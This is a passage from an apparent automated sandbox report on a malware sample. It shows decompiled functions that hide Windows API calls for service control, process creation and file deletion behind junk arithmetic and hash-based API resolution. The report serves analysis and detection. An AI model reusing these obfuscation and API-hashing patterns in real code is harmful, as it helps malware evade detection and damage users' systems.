				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00225fb5
0x00225fb6
0x00225fb7
0x00225fbb
0x00225fbc
0x00225fc1
0x00225fcb
0x00225fd7
0x00225fde
0x00225fe5
0x00225ffc
0x00225fff
0x00226006
0x0022600d
0x0022601a
0x00226025
0x0022602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00226025

Memory Dump Source

Source File: 0000000C.00000002.2119525565.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true

Associated: 0000000C.00000002.2119515961.0000000000220000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2119584774.000000000023C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 387793bae81884d9a14c57a036e56674b9d0b2d7ca770b560513c090cdc2bd9c
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 88F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7B19F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2344 Parent PID: 2856 rundll32.exeCOMMON

Executed Functions

Function 00202959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00202959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0020602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002107A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0020295f
0x00202964
0x00202967
0x0020296a
0x0020296d
0x0020296e
0x0020296f
0x00202977
0x00202985
0x0020298a
0x00202992
0x0020299a
0x002029a2
0x002029a9
0x002029b0
0x002029b7
0x002029bb
0x002029cf
0x002029dc
0x002029e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002029DC

Strings

<^, xrefs: 00202977

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 0b6b64cd32a8cfb3bf9d9c1a397dc65fa9aaf8b5bec0d109a67a54a103bc6b1c
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 2B016D72A00208BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0020C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0020C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0020602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002107A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0020c6e1
0x0020c6e6
0x0020c6f0
0x0020c6fc
0x0020c703
0x0020c706
0x0020c70d
0x0020c711
0x0020c715
0x0020c71c
0x0020c723
0x0020c72a
0x0020c731
0x0020c738
0x0020c751
0x0020c762
0x0020c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0020C762

Strings

/O, xrefs: 0020C6E6

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: de9e8ce7d233097540075d8f6e5b88005d061cda622bef5883e4b8339969054b
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 441133B290122DBBCB25DF95DC498EFBFB9EF04714F108188F90962250D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00201000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00201000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0020602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002107A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00201006
0x00201009
0x0020100c
0x00201011
0x00201016
0x0020101d
0x00201026
0x0020102d
0x00201034
0x0020103b
0x00201047
0x0020104f
0x00201057
0x0020105e
0x00201065
0x0020106c
0x00201073
0x00201077
0x0020108b
0x00201096
0x0020109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00201096

Strings

[, xrefs: 0020103B

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 8b15f08e846e892d74abad7ba779240cce80bb8dbe0ab06e793bf08e6acb311c
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: FF015BB6D01309FBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00204859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00204859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002107A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0020485e
0x0020487a
0x0020487d
0x00204884
0x0020488b
0x00204892
0x0020489d
0x002048a0
0x002048ad
0x002048b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002048B7

Strings

[, xrefs: 0020488B

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 599342f77a71a3a41b96d9e53b9668f9ebe2630e5a728624364a66c51a74e531
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 23F017B0A15209FBDB04CFE8CA9699EBFF9EB40301F20818CE444B7290E3B15F519B50

Uniqueness

Uniqueness Score: -1.00%

Function 00214F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00214F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002107A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00214f80
0x00214f81
0x00214f82
0x00214f86
0x00214f87
0x00214f8c
0x00214fa5
0x00214fa8
0x00214faf
0x00214fb6
0x00214fc7
0x00214fca
0x00214fd7
0x00214fe2
0x00214fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00214FE2

Strings

{#lm, xrefs: 00214FC2

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: eb21ee4bf8a713436f3340f1e3de89525a8c78b7de3c0c60d9b85af5d62893ab
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 92F037B081120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B619B50

Uniqueness

Uniqueness Score: -1.00%

Function 0021976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0021976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002107A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00219772
0x00219773
0x00219778
0x0021977a
0x0021977b
0x0021977e
0x0021977f
0x00219782
0x00219785
0x00219788
0x00219789
0x0021978c
0x0021978f
0x00219790
0x00219791
0x00219794
0x00219797
0x0021979a
0x0021979d
0x002197a0
0x002197a3
0x002197a6
0x002197a7
0x002197a8
0x002197ad
0x002197b7
0x002197c3
0x002197ca
0x002197d1
0x002197d8
0x002197df
0x002197e3
0x002197fc
0x00219816
0x0021981d

APIs

CreateProcessW.KERNEL32(0020591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0020591A), ref: 00219816

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 915ae4b0666a68d244465b2afcc6359c1d95baa4dbb2b038187475594696da5c
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 1211D372800148FBDF199F92DC0ACDF7F7AEF89750F104048FA1452120D2728AA0EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0020B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0020B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0020602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002107A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0020b569
0x0020b56a
0x0020b56d
0x0020b572
0x0020b574
0x0020b577
0x0020b57a
0x0020b57d
0x0020b580
0x0020b583
0x0020b586
0x0020b587
0x0020b58a
0x0020b58d
0x0020b590
0x0020b593
0x0020b594
0x0020b595
0x0020b59a
0x0020b5a4
0x0020b5b8
0x0020b5c0
0x0020b5c4
0x0020b5cb
0x0020b5d2
0x0020b5d9
0x0020b5e6
0x0020b5fd
0x0020b604

APIs

CreateFileW.KERNELBASE(00210668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00210668,?,?,?,?), ref: 0020B5FD

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: e479d9e92eb06f6b92b6c295ab472c6bcaf63302d9b571fa45b14eec85ddf65c
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: EF11B272801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862160D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0021981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0021981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002107A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00219821
0x00219822
0x00219825
0x00219828
0x0021982a
0x0021982c
0x0021982f
0x00219832
0x00219835
0x00219836
0x00219837
0x0021983c
0x00219855
0x00219858
0x0021985f
0x00219866
0x0021986d
0x00219874
0x0021987b
0x0021988e
0x0021989b
0x002198a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002087F2,0000CAAE,0000510C,AD82F196), ref: 0021989B

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 1e0b3b29b646f7d0e1606feb7919bf061c8d5502ffa51adb977dc512f3fff550
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 52019A76801208FBDB04EFD5DC46CDFBFB9EF85310F108188F908A6260E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00217BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00217BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002107A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00217bf7
0x00217bf8
0x00217bfa
0x00217bfd
0x00217bff
0x00217c02
0x00217c06
0x00217c07
0x00217c0f
0x00217c1d
0x00217c25
0x00217c2d
0x00217c31
0x00217c38
0x00217c3f
0x00217c46
0x00217c4a
0x00217c5e
0x00217c67
0x00217c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00217C67

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: d344f00e1694a10d286d6e135df1b8abc9a0dcc9fedfede4f2fecf22f4df2348
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 93014FB190120CFFEB09DF94C84A8DEBBB5EF44314F108198F40567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0020F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0020F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002107A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0020f662
0x0020f663
0x0020f665
0x0020f668
0x0020f66a
0x0020f66d
0x0020f670
0x0020f673
0x0020f677
0x0020f678
0x0020f67d
0x0020f687
0x0020f693
0x0020f69a
0x0020f6a1
0x0020f6a5
0x0020f6a9
0x0020f6b0
0x0020f6c9
0x0020f6d8
0x0020f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0020F6D8

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 1f29f7bcd036c7279cfb53c6f43e24235993aba29b77e948521cb30149014cd0
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 0001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0020B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0020B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0020602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002107A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0020b6f3
0x0020b6f8
0x0020b702
0x0020b70b
0x0020b712
0x0020b719
0x0020b720
0x0020b727
0x0020b72e
0x0020b747
0x0020b759
0x0020b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0020B759

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: cc174ef3deab07e40b75ab63fa77651ab33bce771fdd2a4b457eff0cb4b856e9
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: C6018BB694030CFBEF45DF90DD06E9E7BB5EF18704F108188FA09261A0D3B25E20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0021AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0021AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002107A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0021aa3f
0x0021aa40
0x0021aa41
0x0021aa44
0x0021aa47
0x0021aa4b
0x0021aa4c
0x0021aa51
0x0021aa5b
0x0021aa64
0x0021aa68
0x0021aa6f
0x0021aa76
0x0021aa8d
0x0021aa90
0x0021aa9d
0x0021aaa8
0x0021aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0021AAA8

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 794ffd2a89d5954a3218ce72c10f45cddcd0827985716f0d680deacba6a1b894
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 5EF069B591020CFFDF08DF94DD4A89EBFB5EB40304F108088F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00205FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00205FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
